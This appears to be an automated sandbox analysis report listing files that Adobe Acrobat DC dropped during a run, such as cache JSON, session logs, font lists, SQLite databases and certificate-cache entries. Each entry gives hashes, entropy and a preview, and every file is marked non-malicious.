SHA-512:	633093C884C3446CF188CA46BD6600CBC8C28E34A1FEA2013472BF89F8EE3CF5934AE3B3AF64446FB0B539FB7F1F43D9F7D10F98C94DF4DA85FB35F79A27121F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380623781459747","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":170315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.975824910517686
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqqDsBdOg2HYqAAcaq3QYiub5P7E4T3y:Y2sRdsjEdMHYqAr3QYhbt7nby
MD5:	52C36B6C95AE766D19A6FFF6F80D8824
SHA1:	E0F6688F6A4CA0F7496886DC4663F112C0269FD5
SHA-256:	264242502072929B8B7E238E2405176568FA6F03EFA5A1D8E1CA31D824179689
SHA-512:	633093C884C3446CF188CA46BD6600CBC8C28E34A1FEA2013472BF89F8EE3CF5934AE3B3AF64446FB0B539FB7F1F43D9F7D10F98C94DF4DA85FB35F79A27121F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380623781459747","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":170315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	3878
Entropy (8bit):	5.228376626173982
Encrypted:	false
SSDEEP:	96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzeDj2k5:1CDLCmPj8j0/8qKgwPHYPx8xemT8Ozen
MD5:	87AF6D199E2934215BABDBE62F4C69B9
SHA1:	9E14BE79A9562CEC422CEF5CE24BC461E84CABE7
SHA-256:	D2B12894475E93351F14562BA7D8DB81080B18C3702133A757DB22730056F9E7
SHA-512:	6834ACFEE9076B04C1235C70348E02C3899362D8B9BFAF372A391E4980C359B72A626A252D2EE2EA7B95CCBA18185E600A07B24D79203C423C8FDB974A75A047
Malicious:	false
Preview:	*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.098356187495212
Encrypted:	false
SSDEEP:	6:iOHbuU94q2PqLTwi2nKuAl9OmbzNMxIFUttbwHdJZmwDbI0DkwOqLTwi2nKuAl9c:77qv8wZHAa8jFUtFwHn//Iq5TwZHAa8E
MD5:	510D3E319C176646BB237C9D4B6A738A
SHA1:	12301A2C674E92E32036F2E11F2FFB14303F1C37
SHA-256:	42A2E56D3D52A35010D7A461C75C0A615EEFDF1A74F68509359DD9D03F9890D5
SHA-512:	8ADE5EB911C856BBA8A2EC45583027DC42DE4BAB29D091930D840AE66D7BA38A844D72604C43DBECBD13C85DE0D3B1EEAE36350FBFB753E3CED0B7E3DA47D813
Malicious:	false
Preview:	2025/01/05-02:56:10.005 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-02:56:10.006 1b80 Recovering log #3.2025/01/05-02:56:10.007 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.098356187495212
Encrypted:	false
SSDEEP:	6:iOHbuU94q2PqLTwi2nKuAl9OmbzNMxIFUttbwHdJZmwDbI0DkwOqLTwi2nKuAl9c:77qv8wZHAa8jFUtFwHn//Iq5TwZHAa8E
MD5:	510D3E319C176646BB237C9D4B6A738A
SHA1:	12301A2C674E92E32036F2E11F2FFB14303F1C37
SHA-256:	42A2E56D3D52A35010D7A461C75C0A615EEFDF1A74F68509359DD9D03F9890D5
SHA-512:	8ADE5EB911C856BBA8A2EC45583027DC42DE4BAB29D091930D840AE66D7BA38A844D72604C43DBECBD13C85DE0D3B1EEAE36350FBFB753E3CED0B7E3DA47D813
Malicious:	false
Preview:	2025/01/05-02:56:10.005 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-02:56:10.006 1b80 Recovering log #3.2025/01/05-02:56:10.007 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250105075614Z-185.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	1.7544134515160215
Encrypted:	false
SSDEEP:	192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
MD5:	A61E2E877B9BEBF90983EE1455F6C731
SHA1:	C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
SHA-256:	FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
SHA-512:	B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 13, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.438444925180195
Encrypted:	false
SSDEEP:	384:SeYci5GliBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:fpurVgazUpUTTGt
MD5:	1EECE1348E2A870DEF87C03F9F3953AE
SHA1:	6E0E9315A192569B7C096AD087A4FBC14F707245
SHA-256:	4C16E92C28F460A37F8F755D8358A3A6C3DDA1A6302619581543253872A87201
SHA-512:	E678754E567BD4B74058EC52DF27EC2AEF1A6BDF6BF6E452425FFDCDBBE7CA5124A3819A3ED5AC69A434EA4D3750D4E5F269C880261C38BED602983AFE06C258
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	2.213720778721636
Encrypted:	false
SSDEEP:	24:7+t1X6wKmfqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mo:7MpWKqPmFTIF3XmHjBoGGR+jMz+Lh5
MD5:	513E008501BA6DA7EBF5586BFD120F3D
SHA1:	847868533AE8479049BE6B29913A5904C9838FF7
SHA-256:	5095444AC1FB8CC67B9EDF57ABAC8ADF7FA04C4A6CF97713C6C209B9BCC5A216
SHA-512:	02B3D1034ED8B0187E4B4E96FEB84A834B5100E084FEEBB61EFDAA4EB395D9016D422FBD81A2EFE73ED5F5C0113B132D9E997083AF0594DB05898A4B0ABC72E9
Malicious:	false
Preview:	.... .c......M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.756901573172974
Encrypted:	false
SSDEEP:	3:kkFklQCTzXfllXlE/HT8k/7vNNX8RolJuRdxLlGB9lQRYwpDdt:kKJ+sT8I7VNMa8RdWBwRd
MD5:	CD0516BC1A59C4B57FCED6B550897F1E
SHA1:	6539BDBC837286E8AB5791D8A593AFB601C5EC3C
SHA-256:	B646E90EE050DDCE4AAD269037942E3649A9406A2C7E946F7F44830F322A299D
SHA-512:	8B9C22E72B9396D1C87573061BDC412162F02A22779FD0A32C3ACCF59B43703E4DFB15ECAB7EF5182E4F97B2D68F6CF09AFF5165D989DE6262BE8FCF6CE79C3F
Malicious:	false
Preview:	p...... ...........LG_..(....................................................... ..........W....:...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1280954022511493
Encrypted:	false
SSDEEP:	6:kKHB9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/wDnLNkPlE99SNxAhUe/3
MD5:	ED024EE3C02CAE242A132AE152EE39A7
SHA1:	94CB218A8AF861B79441CBE2627F8D35206D44BD
SHA-256:	A0990D525BFC9AE6A8434ECCAA2344EB579652B54140941177DE18E244B42B55
SHA-512:	81D06070F175F02B4E154CB7A8FE9CBD4785BF2120CD0C8A03AD344A5B235A40E35865A9225B532CDD958B53EAED6ABA00057545C497020DB173DEF0AB6EDA6B
Malicious:	false
Preview:	p...... ..........;_G_..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7968

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7968

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.344872223726413
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJM3g98kUwPeUkwRe9:YvXKX12Oe2mT5LjIPIsGMbLUkee9
MD5:	E5CF6777A7EBE40DACF732F45A22978F
SHA1:	71DE385C63035911268551840BA77E3DC9FADE58
SHA-256:	40B32DA83AC8E7BA431E45C19460A03B47766805B996C226E752E9504EB5C3F9
SHA-512:	4E8BA57EE528A0E8CA6C9A9F1373B864BDEE1BCE91841414B93C56A8FBF6E0237F1A14CEDD71AF24E9D291F55A099D0825912EADB2DC1708E01DBF857F207BC9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2976666726133965
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfBoTfXpnrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGWTfXcUkee9
MD5:	F38695D0C6D4686F017248C9AC0E7399
SHA1:	966FA62019E55D8EDED8D539A4D3F58AC6151F66
SHA-256:	A418EF1B8AA87486BC8DE2B9B017348F986DAFFA0313E9D41C11AD28367757B3
SHA-512:	CD880268AFCB911D9EC23125455EEDE254FC96A44A05C8A923130ECF2C8C9C8566B60238E75BB0237D4DD0E28D98B9B79BC3FF63E4EE74E934304A74633F783F
Malicious:	false
